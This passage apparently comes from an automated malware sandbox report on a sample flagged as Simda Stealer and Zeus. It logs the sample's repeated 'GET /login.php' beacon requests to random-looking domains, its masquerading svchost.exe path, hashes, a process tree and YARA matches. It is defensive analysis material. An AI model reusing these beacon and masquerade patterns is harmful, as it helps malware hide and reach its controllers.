                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
                                                                                                                                                                                                              Connection: Keep-Alive
2024-11-11 17:33:40 UTC | 1096 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:40 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              server-timing: amp_sanitizer;dur="44.8",amp_style_sanitizer;dur="21.8",amp_tag_and_attribute_sanitizer;dur="17.6",amp_optimizer;dur="22.8"
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fQ%2BJ%2Bm8hfbFG1si9e3uB4EnLW%2Fk8IiSwdNLKuFf8m5kfNPwuodid%2FoheG3DpGI12BBbXMpa8EvxDTS9Jk8LDBR4RX%2FWmdnXsQjiX9jCqkuYdROSle9UDxpnd%2F%2BxRwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e1007518df21906-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2533683&cwnd=236&unsent_bytes=0&cid=fcf2c50331b3e5db&ts=1519&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.8  50116        188.114.96.3    443               7652  C:\Windows\apppatch\svchost.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-11 17:33:41 UTC  267                OUT        GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysyvan.com
Connection: Keep-Alive
2024-11-11 17:33:43 UTC  1085               IN         HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:33:43 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
server-timing: amp_sanitizer;dur="44.1",amp_style_sanitizer;dur="21.7",amp_tag_and_attribute_sanitizer;dur="16.3",amp_optimizer;dur="22.3"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F4jZP%2Bi4gO9cxDFlQTghfu8eZWQaOEn4J7YzW7gHt2sYZJJgatUxEa0cg3Tu0JD8%2F2hc635bqvIzijXW1Cj8pMACoiOAYEG5fj2hedUpXkoZvvzc8nvAStVTvhkz3g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e100760285c36c3-YYZ
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=12197&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=236543&cwnd=76&unsent_bytes=0&cid=3e04c6c75e3a395b&ts=1506&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
10          192.168.2.8  57738        188.114.96.3    443               7652  C:\Windows\apppatch\svchost.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-11 17:35:04 UTC  267                OUT        GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyhig.com
Connection: Keep-Alive
2024-11-11 17:35:05 UTC  954                IN         HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:35:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MJiUugFuator45Efysh1gibMhXPmo%2Bb6HH0jrBTYky%2BIRwCHsgl5%2By%2B3h%2BPW45sBDx9zPR%2Fcv5Uc8OzwuOUZD0PmzkdBGAmAjLLpEBxhS3vI6xeREDxjlzLrj8pmfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1009630817422f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1236&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2464680&cwnd=251&unsent_bytes=0&cid=60d719d5bbb6fb72&ts=1355&x=0"
                                                                                                                                                                                                              Data Ascii: fined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JS
                                                                                                                                                                                                              2024-11-11 17:35:05 UTC1369INData Raw: 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66
                                                                                                                                                                                                              Data Ascii: }).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minif
                                                                                                                                                                                                              2024-11-11 17:35:05 UTC1369INData Raw: 2e 73 69 74 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66
                                                                                                                                                                                                              Data Ascii: .site-description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;f
                                                                                                                                                                                                              2024-11-11 17:35:05 UTC1369INData Raw: 65 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76
                                                                                                                                                                                                              Data Ascii: e]::-webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav


Session ID:11
Source IP:192.168.2.8
Source Port:57741
Destination IP:188.114.96.3
Destination Port:443
PID:7652
Process:C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:35:06 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Connection: Keep-Alive
2024-11-11 17:35:07 UTC | 947 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:06 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4NET2WR9%2FwTbZSCRThkcXg6sf35VPYv%2FcoT27yeOvT2zzuT28d4qTBDjGR3aXNqiPSrD%2FWZvZ6nmEAr0XoMgIrqDBpezhm6TF6O400VZVpmGqz0J9vJam1lQvfs8BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e10096fdadf8c21-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1440&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=1987645&cwnd=251&unsent_bytes=0&cid=37722d2a241cb4e3&ts=800&x=0"



                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                              Start time:12:33:04
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Users\user\Desktop\arxtPs1STE.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\arxtPs1STE.exe"
                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                              File size:216'576 bytes
                                                                                                                                                                                                              MD5 hash:6154C4F64B8F9185A4644CDEA5C69408
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000003.1390809231.000000000077B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000003.1390809231.000000000077B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                              Start time:12:33:05
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Windows\apppatch\svchost.exe"
                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                              File size:216'576 bytes
                                                                                                                                                                                                              MD5 hash:5415F923D36E5D49E48A46CDF5D4B082
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                              Start time:12:33:41
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.1829128656.00000000008D0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.1828939687.0000000000870000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                              Start time:12:33:41
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.1844458477.0000000000820000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.1844914899.0000000000880000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                              Start time:12:33:41
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000009.00000002.1857835167.00000000027C0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000009.00000002.1859321562.0000000002BD0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                              Start time:12:33:41
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7376 -s 776
                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                              Start time:12:33:42
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 748
                                                                                                                                                                                                              Imagebase:0x7ff6c9880000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                              Start time:12:33:43
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000D.00000002.1864825235.0000000000D70000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000D.00000002.1866051279.0000000000DD0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                              Start time:12:33:43
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7328 -s 756
                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                              Start time:12:33:44
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000011.00000002.1804322257.0000000000E10000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000011.00000002.1805040996.0000000000E70000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                              Start time:12:33:44
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 740
                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                              Start time:12:33:45
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000014.00000002.1811513588.0000000002560000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000014.00000002.1809736468.0000000002170000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                              Start time:12:33:46
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000016.00000002.1814429100.0000000001220000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
